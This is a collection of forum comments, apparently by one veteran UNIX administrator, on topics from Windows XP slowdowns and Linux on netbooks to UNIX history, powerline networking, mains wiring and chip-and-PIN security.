1395 posts • joined Friday 15th June 2007 09:17 GMT
I'm similarly concerned about *one* of my XP systems. Its a 2.4GHz Celeron D (I think). When delivered, it had 256MB of memory, and ran passably fast (it was bought for utility, not speed), but when my wife recently said that she could not use it any more because it was slow, I had a look.
In 256MB, it was paging heavily. The hard disk light was almost permanently on. Virus, I thought, but no. New scans by recently downloaded copies of both virus and adware scanners showed nothing. Firewall (Smoothwall) showed no unexplainable network activity (but did show how much happens when installed apps check for new versions!) Booted into a live Linux distro just fine, showing the basic hardware was sound. Disabling all the bloated startup background processes made little difference, nor did de-fragging the hard disk.
Doubled the memory, and the machine became usable again. Looked more closely at the memory usage and the installed and running tasks, and saw that there are a whole load of Microsoft patches that are memory resident occupying resource (I'm not kidding, I counted nearly 100MB worth of patches), taking the basic memory footprint of the idle machine to about 260MB.
So. Do Microsoft install patches as memory diverts as opposed to a new kernel?
As an exercise, I installed another system from scratch using XP install media, and found that I could get a newly installed unpatched XP system running quite happily in 128MB (obviously, not using any heavyweight apps., and behind a firewall!) As I installed SP2, it needed 256MB, and when I put in the required virus scanner, 256MB was no longer sufficient for acceptable performance. I did not put SP3 on, although maybe I should .
So, it is quite possible that your slow machine is not slow because of XP, but because there are loads of start-at-boot processes and MS patches using all of the available memory. If there is a modern antivirus system installed (you know, the type that intercepts and inspects [and slows down] all reads and writes to both disk and network), then it is also possible that this is what is crippling a perfectly capable machine. Decide whether it is worth re-installing. Or possibly, investigate Edubuntu, whereby you can dispense with the AV stuff. But this is more than most Windows people are comfortable doing.
So, in reference to my earlier post, the default behaviour for a machine like this will be to chuck the machine and buy a new one. What I don't understand is why do you need half-a-gig of memory just to run an idle machine? Madness.
Windows 7 compatible hardware?
I think the comments here are missing an important aspect of the problem.
I appreciate that it has always been the case that new hardware will always run new operating systems better, but some of the systems people are complaining about aren't really old.
People (and computer companies) seem to imagine that anybody who has a system older than 2-3 years should really replace their hardware. Think what this would mean if the same were true for cars, your heating system, your cooker, or your television ( - scratch the television, the manufacturers are already managing to convince people that their 2 year old 1080i LCD televisions are not 'true HD').
What is missing is the ongoing support for the 2-5 year old Athlon XP, Pentium D, M and 4 machines that are still perfectly capable of doing the Web browsing, Email, Word Processing and home accounts, that many people still have. These are still usable machines, and the only thing that will make people dump them (literally) is either a hardware failure, withdrawal of support (as MS are threatening to do for XP) leading to their online banking complaining that their system is insecure, or a sales person persuading them that what they have is lacking in some way.
If MS wish to make XP an OS of the past, they must have an affordable upgrade path to W7, IE8, WMP 10 etc, and make sure that drivers are available for older hardware (and the same must forced on the display and audio device manufacturers who are so keen on abandoning their old-hardware customer base). After all, I'm sure that a 3GHZ Pentium 4 must be at least as fast as a 1.5GHz Single core Atom 270, which is supposed to be able to run Windows 7 without problems.
Of course, there is a vested interest in the computer manufacturers shifting new hardware, and support issues for older stuff is a useful lever to them. I've long thought that MS and the hardware manufacturers are in collusion to make sure that they continue to sell the new 'shiny' things.
Computers should be commodity tools now, not subject to the whims and fads of fashion. It sickens to see, week after week, serviceable computers and televisions being sent to the recyclers, not because they no longer work, but because the owners have been conned into thinking that the old ones are too old/slow/difficult to secure or support, and the answer is to replace them. I'm not a Green, but the blatant waste is bordering on the criminal.
A computer should be for (it's) life, not just Christmas (sic).
Only just got used to CSM!
It is a mistake to assume that xCat is built from the ground up. It still uses underlying components that are currently used by CSM, including NIM (NIMoL for Linux) for system image deployment and RSCT for monitoring, and they all revolve around other well known systems such as NFS, Kerberos, and rsh/ssh (to say nothing of the open source components ).
It's true that the overall gloss on the top is new, but many of the bits under the covers are the same. It's interesting to also see that IBM Director still uses NIM for Power/AIX systems.
I must admit that I believe that the switch from PSSP to CSM was a bit of a dogs dinner (I understand the architectural reasons for the change, that PSSP was designed around the constraints of the AIX SP/2 which were too rigid for the Cluster/1600 offering) . It took a couple of years for CSM to even approach the usability that PSSP had, and I fear the same will be true for the switch from CSM to xCat2.
The real problem is that often the people who write the code often do not work in the real world, and end up making assumptions about the shape of the systems. This means, once you take into account the various networking, commercial support and security restraints placed on real-world systems by people like Government Agencies and the Financial organisations (the people most likely to deploy large scale commercial clusters), very often the management tools, as delivered out of the box are about as useful as a perforated condom.
Even in HPC environments, it is comparatively unusual to have the systems configured exactly as the vendors suggest. I'm currently working with a large Power6 HPC cluster, and the requirements for outward event reporting to an enterprise reporting system that is NOT Tivoli are causing more than a few problems, along with security, access and data control that IBM had no real incentive to architect solutions for. As a result, it is necessary to dig under the glossy covers of the management and deployment tools using whatever can be found to implement what is needed.
All I can hope for is the fact that xCat2 has come out of Alphaworks means that real system admins have had input to the requirements and may have spotted any potential problems, but I wonder how many 200 Power node clusters have been deployed anywhere.
I'm still not very happy about having to learn another clustering tool, though, and I've still got IBM Director to contend with in the future for non-HPC clusters.
As I remember it, it was the JFS code that IBM wrote for AIX 3.1 that was the main issue. SCO were arguing that this was a derived wok from the AT&T source, although it was more like an evolution of the BSD4.4 filesystem, complete with distributed Inodes and block bitmap for the free space. The whole concept of derivative works currently appears to be sparking controversy with GPL2, which just shows how convoluted US Copyright law is. See http://www.theregister.co.uk/2009/10/15/black_duck_gpl_web_conference_copenhaver_radcliffe/
All the LVM and hooks to extend filesystems were as far as I am aware IBM innovations that were actually new code unique to AIX.
Subsequently, IBM contributed the original LVM and JFS code to the Open Software Foundation, where it became used by several different vendors who implemented OSF/1 (although I don't believe that DEC used it in their implementation, they preferred their own Advanced File System [not to be confused with the Andrew File System]). This did not cause a problem, because all OSF members were already UNIX source licensees.
It is obviously now available for Linux, which caused the whole furore.
If anybody sees my copy of the Lyons annotated V6 UNIX code, I would be grateful to hear, as it appears to have fallen out of my coat pocket whilst in the cloakroom.
@AC - Enjoyed Xenix?
Not sure I understand Microsoft's mismanagement. While they were responsible for the port/rewrite of UNIX that produced Xenix, at no time have they had any control of UNIX. They bailed out of the UNIX market when the original SCO was spun off to a separate company, and the rest is a history of competition.
It is ironic to recall that at one time early in their history, Microsoft did actually see themselves as a UNIX vendor, making statements to the effect that their future was DOS desktop systems clustered around UNIX servers. They were an AT&T source code licensee.
I recollect that at the time, Xenix/286 was regarded as a poor UNIX port, as it did not adhere to man Section 2 system call semantics . I believe that this was only pulled together when (original) SCO joined AT&T, SUN and other notable UNIX vendors in the SVR4 converged UNIX venture, although I am prepared to be corrected on this.
BTW. As it is a trademark, UNIX should always be capitalised.
Anyway, I will be glad when the FUD that SCO have been peddling finally goes away.
As I understand it, because the devices are not intended to broadcast wireless frequencies, they avoid a number of the standards that apply to wireless transmitters.
The standards they fall foul of are the electrical and electromagnetic interference standards, and it does look like some devices are seriously dirty in this respect. And it looks like the frequencies that RSGB are trying to protect are not actually frequencies used by the devices, but unintended harmonics of the carrier frequencies. This should be fixable in the design without making the devices unusable.
I believe that OFCOM (if they are the people who police electromagnetic interference) should crack down on the manufacturer of devices that do not meet the required standards. I wish someone would produce a list of the devices that are dirty, though. I am using some Netgear homeplug devices (which work very well), but I don't know whether they are causing a problem.
Come on - Thunderbirds
Alan uses a video watch in the episode "Move - and You're dead" (1965)
Brains uses a video watch in the episode "Day of Disaster" (1965)
and I'm sure one actually features in the movie "Thunderbirds are Go" (1966). I remember seeing a picture of the oversized model wrist with I believe that it was an early colour TV or possibly a projector behind it. Good effects for the time, all done with models, camera tricks and pyrotechnics (not for the watch, of course, unless you include "30 Minutes After Noon")
That's mine with a copy of "The Complete Gerry Anderson" in the left pocket, and the copy of "Century 21" in the right.
Medium or large businesses do it differently from home users. Very few business related PC's will be put on a desk running the same cut of the OS as it was installed with by the manufacturer.
Almost anybody with an IT department will have an image that they will put on any new PC that they take delivery of. This installs known versions of all of the standard software. It is quite normal for their 'fix' for software-borked PC's to be to re-install the initial image. It's quick and low overhead, and can be done by your average IT trainee.
Many businesses will also create updated images for their existing PC's to 'bring them up to date'.
While I doubt that many will deploy a new OS (like Windows 7) on older kit (mainly because of the licensing costs), it is refreshing to know that it probably would work on any relatively modern PC. Of course, many businesses could extend the lifetime of their aging kit and maximising ROI by either making them thin clients, or putting a fee free OS on them for the sector of their business that can work with Firefox, Java applications and Open Office.
... gopher and archie, as well as uunet, usenet and many other net-news and email services as early users of Internet connectivity. These all pre-dated NCSA Mosaic. Ahhh. Plain text protocols. How trusting we were.
Nooo, I didn't have a coat, or wait, maybe I did... I get so forgetful now.
This is the reason why the current BT master phone sockets include a "service jack". Under the front plate is an internal phone plug attached to the plate and socket attached to the base All extension wiring is attached to the front plate. By removing the front plate from the master socket, you are removing all extension cabling and other devices in the house, and leave the circuit with a single phone outlet that BT can be reasonably certain is not compromised by customer supplied wiring (it's actually a against your contract to mess with the wires on the BT side of the master socket).
It's not difficult and is perfectly safe provided that nobody has wired mains into your house telephone wiring. Ring signal voltage is only about 50V at limited current, so even in extreme cases should not cause even people with heart conditions a problem.
I think that it is also in your contract with BT that they may ask you to do this.
I know many people regard PC's as appliances, but in reality they are not, and there should be no 230V mains outside of the power supply, so there are no real safety concerns about taking the side panel off of a computer. Of course, some manufacturers actually dissuade you from taking the covers off by putting tamper stickers on the case (personal experience with the now defunct Time, Fujitsu-Siemens and even an eMachine [bought from MorganComputers, not PC World I hasten to add]). This causes different concerns about allowing people to upgrade their systems.
Users unwilling to learn
It's switch off on my Wife's computer. She is an unwilling novice, and a bit of a luddite as well. She does not remember what I tell her about computers from one day to the next, mainly because she just doesn't care.
All I hear from her is "I've put my CD in the drive, and it's not working" when she puts one of her craft CD's in the system.
God knows how many times I've told her, but the instructions on the CD cover tell her that it will autorun, and she trusts that more than she trusts me. It's driving me crazy.
This type of software is written for people who will never care about how computers work, and uses every trick in the book (and some daft ones as well) to try to make sure that the computer is just an applience. I can't even install the software on the hard disk, because the STUPID and SIMPLISTIC copy protection system KNOWS that it will ALWAYS run from drive D, and has hard coded-paths scattered throughout the software. Of course, nobody partitions their hard disks, do they!
I admit that I use HomePlug standard devices in my house, because the wiring is already present, and being an older house with thick walls, built over three stories, even with Wireless range extenders (repeaters), I have significant WiFi dead spots. Likewise, running Cat 5/5e/6 around the house to all of the kids bedrooms would be an expensive option, even if I were to use PDS-like infrastructure, not that I would want to have powered switches on every floor of the house for economy reasons.
I am worried about what this article is saying, because I try to be a good neighbour, but had not considered that I would be polluting the EM spectrum to the degree implied. I trusted that the manufacturers would abide by the standards, that the standards were reasonable, and that OFCOM would police them.
If two of these three trusts cannot be relied on, then I am worried that I might be impacting my neighbours, at least one of whom have a large pole antenna, presumably for HAM or Shortwave radio. Should I be going around all of my neighbours asking whether I should stop using Powerline Ethernet, or should I sit back and wait to see whether I get a knock on the door about these devices.
I would hate to have to dump the devices, because they are just too useful.
P.S. All of my devices are Netgear 14 or 85Mbs devices, not BT supplied devices.
Anybody got a reference to the patent that has been infringed? I've backtracked all of the related Reg. articles, and I cannot find out the patent number. It would help us understand whether MythTV or any of the other TV recorder programs are likely to disappear.
You've obviously never worked anywhere Sarbaine Oxley or Basle II requirements have been applied (like *ANY* Western financial organisation). If you follow these as specified, you have to implement a segregation of authority, meaning that your system administrators cannot subvert the security logs (at least, not without leaving a secure-from-them audit trail). There should be a different part of the organisation who have no ability to change the systems, but who do have authority over the logs, whose job it is to make sure that the sysadmins do not step over the mark.
The problem in a nutshell is that, yes, the sysadmins can do pretty much anything within their control, but this should be subject to audit. By allowing sysadmins to peek at other user's passwords, it enables them to do things as other users while bypassing any audit trail that points back to *THEM*, and leaving a false trail pointing at someone else.
Key loggers and password leaking backdoors should not be able to be installed without again leaving some evidence of the fact.
As SarBox is mandatory for US financial organisations, does this mean that it should be recommended that SQL Server should now be added to the banned software list, or at least relegated to non-customer and non-financial database use?
This behaviour from a major IT provider is just inexcusable.
Virgin getting better
I was at the point of leaving Virgin because of their FUP bandwidth limits which they hit me with every two weeks or so (there are 5 family members in the house, using a total of 1GB+ per day - no it's not P2P, just OS fixes, internet voice chat, gaming, iPlayer, SkyAnytime PC, iTunes, Amazon MP3 store, YouTube etc.)
But they've not complained or limited me in the last three months, and the performance has improved at peak times (I can actually use iPlayer in the evening!)
I guess they must either have lost some other customers, or increased their local bandwidth. As a result, I'm currently quite happy.
I don't use their support unless I really have to, however, as it appears I know more about their network than the people in their call centres.
I don't understand the fuss
I know genetic UNIX well. I do not know Linux kernel as well, but I do know this.
Userland processes run in a virtual address space controlled by the kernel that does not match physical memory addresses.
The memory mapping registers that control a processes virtual address space can only be manipulated with the processor supervisor bit set (this should only be set when running kernel code after a system call, or in a kernel thread), so a process cannot map new bits of physical memory into it's address space without the kernels involvement. This is a FUNDAMENTAL security requirement that is well understood by kernel writers (and incidentally, a reason why the first versions of Windows on Intel processors prior to 80286+80287 or 80386 were fundamentally insecure)
Page zero of a userland process does not necessarily map to physical page zero. It's dependent on the hardware architecture of the system and the way that the process virtual address space is set up by the kernel and whether you have a separate set of supervisor mode memory mapping registers.
In all UNIX variants I have used that do map page zero to virtual page zero in a userland process ALWAYS write-protect this page, and most hide them so they can't even be read. It is normal to only map page zero if the system call interface does not provide a mechanism to change the memory mapping registers during the transition to system mode (IBM's original RS/6000 processors could not do this. The result was that the first piece of kernel code actually has to execute in the non-privileged processes address space before it has the chance to change the memory mapping registers, so some kernel code had to appear in the processes address space).
So. My question is how do you write to physical page zero to exploit this problem without already having escalated privileges? Maybe someone with some real Linux kernel experience can explain.
I'm off to /usr/src on my laptop to have a dig. If I find anything relevant, I'll post again.
Re: Exploding Phones
It is axiomatic that if you want a high capacity battery, then it holds a lot of energy when charged. It is also a fact that high capacity==highly reactive chemicals in the battery (after all, it is a chemical reaction that produces the energy).
This means that pretty much all devices with batteries are potentially dangerous (if you don't believe me, try shorting a couple of good alkaline AA cells connected in series, and see how long you can hold them!). And you will get even more spectacular results with NiCads (it all depends on the internal resistance of the battery - the lower the resistance, the faster the battery can be made to liberate it's total capacity, and as we know from school physics V=I*R but P=I*I*R, so the lower the resistance, the higher the generated current and thus the higher the rate-of-release). Power=heat, heat means liberated gas which can cause explosions and heat that can cause burns.
Bearing in mind how much energy is required to move a car, I would hate to see what would happen to a Lithium Polymer battery car in a fiery crash with a petrol vehicle. Nor would I want to be a fireman trying to tackle an electrical fire on the motorway.
I claim that this is either a Chemistry or Physics teacher and this is a Pedantic Thermodynamic and/or Electrical Power Equation Nazi Alert! .... Come on, it is Friday afternoon.
@AC re EMP
What's the flight-deck made of? Wood? (sorry, that was the WW2 Yank carriers, wasn't it).
I think that the couple of inches of steel needed to support the weight of the planes would be at least as good as tinfoil at stopping the magnetic leakage from the linear motors.
@AC "Just too many"
I can certainly appreciate many of the things you have said, indeed when I was reading it I wondered whether I had written it in my sleep until I got to the point about OSX.
You are, however, taking the Luddite view that I strenuously try to avoid. Yes, UNIX has been a good operating system (and my bread-and-butter) for the whole quarter century plus of my working life, but that does not mean that it will remain a good operating system forever. Like it or not (and I don't), genetic UNIX is now a dead end. Novell, SCO or whoever owns the AT&T code base now have no interest in reviving UNIXWare, HP/UX and Tru64 are legacy (thanks HP!) and the future of OpenSolaris is questionable, with the sands rapidly running out on Solaris for SPARC. This leaves AIX as the last actively developed AT&T derived UNIX (I'm ignoring the smaller companies, most of which are gone or going anyway).
OpenBSD, by the very nature of the court battle between Berkeley and AT&T that made it AT&T code free can only nominally be called a genetic UNIX (yes, I know about the V7 code base, I was around then), and I do not remember whether OpenBSD, FreeBSD, or NetBSD actually got SVID or XOpen accredited.
So what you now have is a diminishing number of marginally incompatible UNIX systems which adhere to a set-in-stone standard which is becoming increasingly unimportant, and Linux. If you look at where the technological change is coming from, it is certainly not from the UNIX community. Where have the latest X11 and graphics driver changes come from. How about the virtualisation technologies (and, yes, IBM use Linux as an enabler for their hypervisor). Web browsing, Multimedia, printer support, User interface. This work is all happening in Linux space and being backported on occasion to the UNIX base. This includes Perl, Python, Ruby, Apache and any number of other Open Source packages. And often, it is very difficult to compile these on AIX, at least, because of the number of additional libraries needed. This is a much more difficult problem than it would be on *ANY* Linux distro.
The number of people I now work with in UNIX space who EXPECT the GNU variants of the command set by default is now considerable. I keep having to bite my tongue to not remind them that GNU's Not UNIX, and they should not think that they are the same.
I work mainly with AIX, and I am finding that the number of pure AIX people I deal with is minuscule. Everybody who has an interest in computers outside of work is at least dabbling in Linux, if only to give them another career strand if and when AIX falls out of favour with the banks and government agencies.
So by all means immerse yourself in OSX as the closest thing to a genetic UNIX available on the desktop, but please do not regard yourself as a typical UNIX person. You're not any more. (Do you really use TWM as your window manager? I'll admit it's fast, but the word basic does not even start to describe it! If you do, you would probably feel very happy with fvwm on most Linux distros).
BTW. I'm currently playing with V7/x86. Now that is a true genetic UNIX, although not much use for watching DVD's. In case you are interested, it's running inside VirtualBox on Ubuntu 8.04 LTS, which is very suitable as a low maintenance Linux distribution.
Mine coat is the faded corduroy jacket with the leather elbow patches, and has the Lyons annotated UNIX V6 source in the inside pocket. Careful, it's like me, old and a bit fragile.
Old, old, old.
ARP spoofing has been around as long as ARP and IP has been in use, i.e. a long time. Using it for VoIP and Video-over LAN is new, but merely a new application of an old technique.
Unfortunately, gratuitous ARP is too useful in device failover scenarios for it to be removed from the standard for all devices. The answer is to make sure that nobody has unauthorised access to the LAN, and of course when we say LAN here, we are talking about the routed segment that runs the same subnet as one of the end-point systems. This is why the technique is not applicable to the Internet as a whole.
@Linux is not held back
Like so many things in life, one size never fits all.
Linux is in an awkward place at the moment, being the only real alternative to Microsoft's domination from top to bottom of the computing world. It is the only single OS that goes from embedded devices, PDAs and phones, desktop, server all the way to mainframes and supercomputer (I know OSX fits in many of these categories, but I have yet to see a supercomputer running it!). And before anybody shouts that it is not a single OS, I would suggest that it is more a single OS than Windows Mobile, Embedded Windows, Server and 7 will ever be.
But because of this, it needs diversity. The requirements of low power for portable devices, prettyness for the desktop and maximum instructions per second for HPC do not fit together in a single distro.
So, for the masses using Intel and AMD PC's, Ubuntu is desperately needed (support, ease of install and use, good HW coverage). For smaller devices Chrome and Android work. For servers, Redhat Enterprise, Debian, CentOS and SuSE. For bleeding edge development, Fedora. For HPC, any of the many custom distros used by IBM or SGI or Cray or NEC. And if you have a preference for another distro not mentioned here, please use it, with my blessing.
Where's the problem? There is no 'tearing apart' of the Linux developer community to support these, and while the publicised events at CentOS ripple the water, they will never really damage the perception of the people who use CentOS. And even if it does, I'm sure that most places using it would prefer to switch to RedHat Enterprise or a Centos fork rather than Windows.
The only problem I can see is making sure that the people behind the distros remain committed and engaged. This is what has happened at CentOS, and even if another path had been followed (CentOS forking), I don't believe any users would have suffered.
Unfortunately, it is not possible for the community supported model to offer all that established commercial OS providers can. We will see some distros fall out of favour (Slackware springs to mind). So we need players like RedHat, Novell, IBM et. al. as well to generate revenue that pays for at least some of the people who contribute to the core development.
All that happens in forums like this is really noise, albeit interesting in parts.
In about 1984, I was shown a hardware speech recognition system attached to a BBC micro that could be trained for about 200 words reliably.
In 1990, I was shown a software system running on an Intel 386 system that would achieve about 80% accuracy when untrained, rising to over 90% when given some training.
In about 1999, I played around with Dragon Naturally Speaking and ViaVoice, both of which were able to do a competent job of turning speech into text, even if they only did basic syntactic analysis.
Each time, I was told that 'context sensitive, natural language recognition' was only a matter of 5 years away.
In the 25 years during which I have seen voice recognition working, commodity computing power has risen by something like 4 orders of magnitude, and DSP hardware that can do the majority of the work has become even faster, and significantly cheaper.
Why is it, then, that it is so impossible for this technology to work? And why do we not have home media centres, fridges and cookers that we can talk to? After all, an iPhone can listen to a song and name it with a high degree of accuracy. It's really just a matter of application.
I guess that it is just one of those unfulfilled technological dreams. Or possibly, the computer and device manufacturers don't want it, because it would start to make the GUI irrelevant, and slow down the pace they could re-sell us ever more pretty and more compute and graphics intensive operating systems and hardware.
God, I've been in this business too long.
@AC "They never stop..."
...and all Windows and Mac users are corporate sop's, who slavishly buy anything from their favourite money guzzling multinational as long as it's shiny, yes?
I don't think either stereotype really fits the majority of people.
I use Linux because it is UNIX like, because of the intellectual freedom, and also because it's not encumbered by someone trying to extract as much money as possible from me as often as possible. This is not being a freetard, merely financial prudence. I have in the past paid for Linux distros before the Internet was fast. And I buy all my media unless P2P is the *ONLY* way to get it as a last resort (mainly deleted titles). And I waited a long time until Amazon got their MP3 store up and running (usable from Linux - Horay) before doing anything other than ripping CD's and LP's for music.
And I have credit cards. Mainly because (shock, horror) I have a family (a real one, with kids and all) and I need to even out money flow sometimes. Might consider swapping one to get one with TUX in my pocket. Might not though...
@AC on SPARC's death
SPARC always was a published architectural standard. That's what Sun wanted when it created the original SPARC (I still have the launch blurb in a box somewhere). It never really wanted to be in the chip foundry business, but to use partners to license, develop and produce the silicon. Never quite worked out as they intended, but I believe that this fundamental way of working still exists.
I expect SPARC to out-survive Sun by some considerable time, especially if Oracle decide to cut the SPARC standard free, which is what it deserves.
Open-source hardware. What an interesting idea...
That Transfer-Encoding error is caused by using Firefox through a squid transparent proxy to view DS. It's been a problem for over a year. It was not clear if it is a DS, Squid or Firefox problem last time I looked.
As a committed Linux user, I have not been able to use iTunes even when I had a functional iPod (it broke!).
I started using Amarok for maintaining my iPod, and then discovered that I could buy music from Amazon's MP3 store using Linux, and plug the music into Amarok. The selection is quite extensive too.
I am now using a no-name Chinese media player, and Amarok handles this as well (although I miss the music organizer that the iPod had). It can also handle TCMP on my Palm Treo.
So, it should be possible to buy and run a Pre without needing iTunes.
Apple do not yest
Viglen? A PC manufacturer?
If I remember correctly, they started by skinning TEAC bare 5.25 floppy drives in a plastic sleeve case, with appropriate wires and a 40/80 track switch, for BBC Micros. Not a PC product in sight then.
I've still got one somewhere, and it (and the BBC Micro) still worked last time I tried it (but the floppiess themselves are pretty patchy). Think I paid £199 for it, plus the cost of the 8271 disk controller kit and DFS ROM. Seemed cheap at the time, and it probably was, bearing in mind how many people bought them!
If you look, there is a battered copy of the BBC Advanced User Guide in the inside pocket. Thanks.
Why in this day and age have we not also got low voltage DC plumbed into houses? Put a 12V supply in, and you could almost certainly do away with the vast majority of the black bricks that litter our houses. It is much easier to go 12C DC to 9V or 5V DC in a compact manner (look at car devices), and once it is in as a standard, especially if it is a plugless track system, then small devices will be made to work from 12V directly and not need a step-down. We then no longer need bulky 230V 13A plugs!
This would also allow us to move from inefficient transformer/rectifier devices (the majority of cheap power supplied) to a more efficient larger central switch-mode power supply to keep all of the greens happy and reduce our power bills.
Only problem would be the high current demands of certain devices.
I said three carry the power, and a common neutral. 3+1=4. Yes? Please read the comment before posting.
Single phase. Yes, domestic properties just get a single phase. Commercial properties quite often get three phase, but this is used as three 230V feeds which go to different parts of the property, unless you have something like a mainframe or an IBM SP/2 (RIP). But even these (I believe) separate the circuits out to 3x230V into 40V(?) DC converters, and then distribute this around the frame.
When I was at college, we found that the two sides of our dining hall (where we had bands playing) were on different phases. Caused no end of earth-loop hum on the PA equipment we used until we worked out what was going on. And you could get quite a belt between the EARTHs of the two different sides, as they were earthed separately (we measured 120V AC between the earths).
When they say three wire single phase, I presume they mean 2+Earth. Normally, Earth is a local earth, with just 230V Live and Neutral on the cable from the electricity company.
If you have three phase, they also provide a neutral, thus requiring a four wire, three phase installation. Only specialist equipment runs 415V between phases, and this is not the norm for most sites, although I will probably get flamed for generalisation.
@Anon re: Earth and Neutral bonded together
Typically AC is carried by the power company in three phase (i.e. three separate wires carrying AC power wrt ground with a 120 degree phase difference) and a common neutral. The effect of this is that when averaged out, the three phases should have a potential wrt ground of 0 volts, so the neutral wire should carry no power (it all cancels out), and will somewhere in the power infrastructure be grounded (but not in your house!).
Unfortunately, the real world is not so simple. Most inductive loads (read high power devices) cause a phase shift to the AC waveform, so the combined neutral may carry residual AC voltage, especially in a single phase installation. Also, when you are looking at power delivery to domestic houses, it is normal for each house to only be on a single phase, and the phases alternated down the street (so your each of your neighbours may well be on a different phase from you). This means that if you grab neutral, you had better be prepared for a shock, although it is unlikely to be a full 230V and *may* be negligible. It really depends on the difference in power consumption between you and everyone else attached to your local substation, and how good your regional electricity distribution company is at balancing the load between the phases.
This alternation of phases also explains why it is possible for some types of power cut to only affect some of the houses in a street.
Inappropriate comments on Reg. forums?
Humour aside, Can I claim the comments on the alternative meaning of Ubuntu as abuse? They are dis'ing my technical ability as a committed Ubuntu user.
I could do both Debian and Slackware, but basically I haven't the time. I use Ubuntu because it needs little time, not because I am technically naive (and also because it returns a superior user experience).
My cost is the one with the picture in the inside pocket of 30 years of Unix and Linux documentation on a shelf at home.
Please don't take Asus's implementation of Xandros as a typical Linux. It's not, and I have already said so. Try Ubuntu Jaunty Jacalope. I think you will see that it is a world apart from Xandros, and I believe, easier to install (and use, IMHO) than Windows.
Your comment about a 'new user' has two possible meanings. A new to Linux but previous Windows user will see anything that is not Windows as different and possibly difficult. A new to computing user is unlikely to see any real difference in ease of use between recent Windows or Linux.
You just have preconceptions as a Windows user. I am a long term Unix user (since before Windows, and in fact PC-Dos), and I find Windows infuriating. But I am not so blinded that I cannot see the merit in what Microsoft and their numerous partners have achieved in usability. But just because Windows is dominant in the non-server market does not make it automatically best.
Many of the core 'features' of Windows (such as drag-and-drop) were actually developed by others, and some appeared on Unix and other OS's before Windows (look at Looking Glass on Unix) You might be surprised at what the Torch Triple-X could do back in 1985, and of course Sun, and Apollo in the workstation market.
I appreciate you making the effort with Xandros. Unfortunately, it was almost certainly the wrong Linux distribution for what you wanted (as would any of the niche distributions, or in fact, the Linux in a Tivo or any embedded system). You might draw an analog between EeePC Xandros and Windows Mobile Edition. I don't think you would enjoy getting that to run Firefox 3 either.
I'm not arguing any different about Xandros, but if vendors shipped with Ubuntu, you would have had a different experience.
The space issue, which is a feature of the way UnionFS was used, is one of the primary problems for the EeePC. It's good for a device that will rarely change, but not for a dynamic OS. This is one reason that Asus's implementation of Xandros was just no good for those who know, but very good for those who use the device as an appliance.
I think that your comment about 'no one really wants a frozen, nonupdatable snapshot of a system' is not actually true. In know a large number of people who once a system is as they want it, will never touch the configuration again. It's just that they are not in the technical community. Many people want to use a computer as a tool, not just as a means to itself. My father is still using IE 5.5 on Windows 95 OSR2, and he has no desire to update it. It does what he wants, and I'm sure that he is not atypical of a large part of the potential netbook market. (Please note I am not suggesting Win95 on todays netbooks, just illustrating a point!)
If you doubt this, just look at the stats. on the number of un-patched Windows systems out there, and patches are easy to apply.
But this market is not even getting the opportunity to buy into netbooks, because Microsoft's behavior, and negative comments are frightening people away from Linux.
I just wish that a netbook supplier would ship a good, major Linux distribution. Then we would see whether MS have really managed to capture this market. This has to be done before the Windows 7 tax appears, as afterwards will be too late.
I, too, dumped Xandros on my EeePC 701, but this was because I wanted a full Linux, and although you could enable kickstart and a KDE desktop, it was sufficiently different (did anybody else try to work out how it started with you logged in).
I suspect that people who actually used the 701 as it was intended (the easy desktop) would be happy, but this was not me. Unfortunately, it was mostly people like me who saw the benefit.
What do you think is difficult with Ubuntu? If you just want mail, word processing, spreadsheet and browsing, Ubuntu is no more difficult than Windows. You do not need the command line, the update manager just works (click on Update, and off it goes) and you do not need a degree in Computer Science to use it. Evolution, Open Office and Firefox provide the basics that home users need, and they are installed by default during a standard install.
Of course, if you want Outlook, Word, Excel and Internet Explorer, then I'm afraid that Linux is probably not for you, and you have been suckered in to the Microsoft way.
I've just put Jaunty on the IBM Thinkpad T20 (700Mhz Pentium 3, 256MB memory, 20MB hard disk) that I am typing on (it was mine some time back and I am re-cycling it for one of my kids), and everything, and I mean everything, just worked from the install disk including the Belkin wireless card, identified and installed during the normal graphical install process. This is a dual boot system, and even knowing the Lenovo/IBM website, I have been unable to identify all of the correct screen and graphic drivers for Windows. And there are no applications installed. Sure seems to me like Ubuntu is easier. And for such an underpowered system (even by netbook standards), it is surprisingly usable. I can imagine that Jaunty (or an easy peasy derrivitive) is very suitable for netbooks.
I did not have to resort to the command line, or edit a configuration file once. I would have no hesitation in giving such a system to my father, who is 80. I'm sure that he would keep it up to date better than the Windows box he currently uses.
So stop spreading FUD. Ubuntu is a viable alternative already. The only thing that may stop it is a lack of technical support in the suppliers and maintainers, and this is only because there is not enough market penetration to make it viable for them to skill up. It's really a chicken-and-egg situation, which is being made more complex by the anti-competitive practices that Microsoft engage in.
I still think there are Firefly stories. I want to know what was the back story for Shepherd Book was, and I'm sure that there were plenty of war stories for Zoe and Malcolm.
Did the comics add anything to this?
B5 is finished. The story is finished (as JMS intended, although slightly out of sequence), and the spin-offs do not stand up against the original.
OK, I'm now worried. I think I always knew that some ATM's would use the magnetic stripe, but reading what you wrote makes me nervous.
Specifically, the same PIN is used for the Chip as would be required by a mag-stripe ATM.
OK, the PIN for the C&P is safe, as it is effectively used as one of the input keys to the challenge-response that the on-card chip uses, and is thus is not stored on the card.
So how does (and always has) the PIN for the mag-stripe worked? If this can be brute-forced in some way, does this not also compromise the C&P PIN?
Maybe I just have not understood how the mag-stripe authentication works, but it has to be checked by the ATM, and not every ATM in the world has my PIN stored in it. Is it one-way hashed in some way, or is it stored centrally and queried from the central repository each time the card is used. In the latter case, I sincerely hope that the telecoms traffic between the ATM and central repository is encrypted, and that every partner bank has the same high degree of security to ensure that it cannot be fraudulently queried or possibly snooped.
Linux on netbooks
There are two reasons why Linux on netbooks is loosing attention.
The first is that the versions of Linux shipped are, well, pants. I ditched Xandros, even after I broke out of the simple interface on my eeePC701. If they shipped a mainstream distro, things may be different.
The second is that Microsoft stomped on the market by allowing XP, a dead OS as far as Microsoft was concerned a few months earlier, to be cut down and shipped at effectively no cost, merely to prevent Linux getting a decent foothold in a part of the PC market.
One wonders if they will be as willing to give away Windows 7 when this comes alone. Or possibly they think they will have cornered the market by then.
From a customer perspective, if they can buy something familiar verses something different, both at the same price, I know what they will choose. Linux only had a chance in the mainstream when there was a price difference, and this was because they could be made with less memory and disk space and a free OS compared to a Windows system. Stop making the smaller ones just for Linux, and you will only sell Windows systems.
OK, you're a Mac Fanboy, so I should expect some of what is in your post, but...
